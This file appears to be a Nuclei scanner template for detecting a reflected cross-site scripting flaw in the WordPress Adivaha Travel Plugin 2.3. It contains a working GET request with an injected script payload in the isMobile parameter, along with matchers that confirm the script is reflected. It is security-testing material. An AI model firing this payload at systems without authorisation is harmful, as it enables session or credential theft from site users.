mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-08 03:33:18 +08:00
28 lines
1.1 KiB
YAML
28 lines
1.1 KiB
YAML
id: wp-adivaha-xss
|
|
|
|
info:
|
|
name: WordPress Adivaha Travel Plugin 2.3 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51663
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: wordpress,wp,wp-plugin,xss,adivaha,travel
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mobile-app/v3/?pid=77A89299&isMobile=%20clq95%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Elb1ra"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains_all(body, "<script>alert(document.domain)</script>", "travelpayout_flight")'
|
|
condition: and
|
|
# digest: 490a0046304402201032f4a4757fa2f8a7fcafa207d752d7f2add1494570bea47d1f502e3922f54602206ae60e32b87372cc4af01a09e8a1227c41d2d89ced6f8791ef44d9554276ecd1:922c64590222798bb761d5b6d8e72950 |